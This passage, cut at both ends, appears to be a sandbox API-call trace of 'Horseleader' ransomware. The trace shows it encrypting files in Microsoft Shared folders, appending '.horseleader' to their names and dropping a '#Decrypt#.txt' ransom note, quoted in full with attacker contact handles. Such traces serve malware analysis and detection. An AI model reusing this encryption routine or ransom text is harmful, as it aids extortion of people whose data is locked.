SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.989] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1305b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.989] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.990] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.990] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.990] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x260b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.990] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.991] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.991] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.991] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.992] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.992] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.992] CloseHandle (hObject=0x158) returned 1 [0225.992] GetProcessHeap () returned 0x780000 [0225.992] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.992] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.horseleader") returned 84 [0225.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.horseleader")) returned 1 [0225.994] GetProcessHeap () returned 0x780000 [0225.994] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.994] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 1 [0225.994] lstrcmpiW (lpString1="MTEXTRA.TTF", lpString2="Windows") returned -1 [0225.994] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 71 [0225.994] StrStrIW (lpFirst="MTEXTRA.TTF", lpSrch=".horseleader") returned 0x0 [0225.994] lstrcmpW (lpString1="MTEXTRA.TTF", lpString2="#Decrypt#.txt") returned 1 [0225.994] lstrcmpW (lpString1="MTEXTRA.TTF", lpString2="_uninstalling_.png") returned 1 [0225.994] lstrlenW (lpString=".testttjffg") returned 11 [0225.994] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", lpSrch=".testttjffg") returned 0x0 [0225.994] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.994] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, 
dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.995] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 71 [0225.995] StrStrW (lpFirst="MTEXTRA.TTF", lpSrch=".txt") returned 0x0 [0225.995] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7656) returned 1 [0225.996] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1de8, lpOverlapped=0x0) returned 1 [0225.998] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe218, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.998] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1de8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1de8, lpOverlapped=0x0) returned 1 [0225.998] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.998] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.998] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) 
returned 1 [0225.999] CloseHandle (hObject=0x158) returned 1 [0225.999] GetProcessHeap () returned 0x780000 [0225.999] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.999] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.horseleader") returned 83 [0225.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.horseleader")) returned 1 [0226.000] GetProcessHeap () returned 0x780000 [0226.000] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.000] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 0 [0226.000] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0226.000] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\#Decrypt#.txt") returned 73 [0226.000] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\#decrypt#.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0226.001] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0226.001] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0226.002] lstrlenA (lpString="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") returned 1368 [0226.002] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0226.003] CloseHandle (hObject=0x21c) returned 1 [0226.003] GetProcessHeap () returned 0x780000 [0226.003] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0226.003] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="EURO", cAlternateFileName="")) returned 1 [0226.003] lstrcmpiW (lpString1="EURO", lpString2="Windows") returned -1 [0226.003] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO") returned 55 [0226.003] lstrcmpW (lpString1="EURO", lpString2=".") returned 1 [0226.003] lstrcmpW (lpString1="EURO", lpString2="..") returned 1 [0226.003] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0226.003] GetProcessHeap () returned 0x780000 [0226.003] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) 
returned 0x7d9fd8 [0226.003] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*") returned 57 [0226.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0226.050] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0226.050] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\.") returned 57 [0226.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0226.050] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0226.050] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0226.051] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\..") returned 58 [0226.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0226.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0226.051] FindNextFileW (in: 
hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 1 [0226.051] lstrcmpiW (lpString1="MSOEURO.DLL", lpString2="Windows") returned -1 [0226.051] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 67 [0226.051] StrStrIW (lpFirst="MSOEURO.DLL", lpSrch=".horseleader") returned 0x0 [0226.051] lstrcmpW (lpString1="MSOEURO.DLL", lpString2="#Decrypt#.txt") returned 1 [0226.051] lstrcmpW (lpString1="MSOEURO.DLL", lpString2="_uninstalling_.png") returned 1 [0226.051] lstrlenW (lpString=".testttjffg") returned 11 [0226.051] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpSrch=".testttjffg") returned 0x0 [0226.051] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.051] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.051] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.052] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") 
returned 67 [0226.052] StrStrW (lpFirst="MSOEURO.DLL", lpSrch=".txt") returned 0x0 [0226.052] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=31104) returned 1 [0226.052] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.055] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.055] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.055] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2980, lpOverlapped=0x0) returned 1 [0226.056] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd680, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.056] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2980, lpOverlapped=0x0) returned 1 [0226.056] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.056] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.056] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.056] CloseHandle (hObject=0x158) returned 1 [0226.056] GetProcessHeap () returned 0x780000 [0226.056] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.057] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.horseleader") returned 79 [0226.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.horseleader")) returned 1 [0226.057] GetProcessHeap () returned 0x780000 [0226.057] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.057] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 0 [0226.058] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0226.058] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\#Decrypt#.txt") returned 69 [0226.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\#Decrypt#.txt" (normalized: "c:\\program files\\common 
files\\microsoft shared\\euro\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0226.058] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0226.058] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0226.059] lstrlenA (lpString="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") returned 1368 [0226.060] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0226.060] CloseHandle (hObject=0x21c) returned 1 [0226.060] GetProcessHeap () returned 0x780000 [0226.060] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0226.060] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Filters", cAlternateFileName="")) returned 1 [0226.060] lstrcmpiW (lpString1="Filters", lpString2="Windows") returned -1 [0226.060] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters") returned 58 [0226.060] lstrcmpW (lpString1="Filters", lpString2=".") returned 1 [0226.060] lstrcmpW (lpString1="Filters", lpString2="..") returned 1 [0226.060] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0226.060] GetProcessHeap () returned 0x780000 [0226.060] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7d9fd8 [0226.060] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*") returned 60 [0226.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0226.063] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0226.063] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\.") returned 60 [0226.063] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0226.063] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0226.064] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0226.064] wnsprintfW 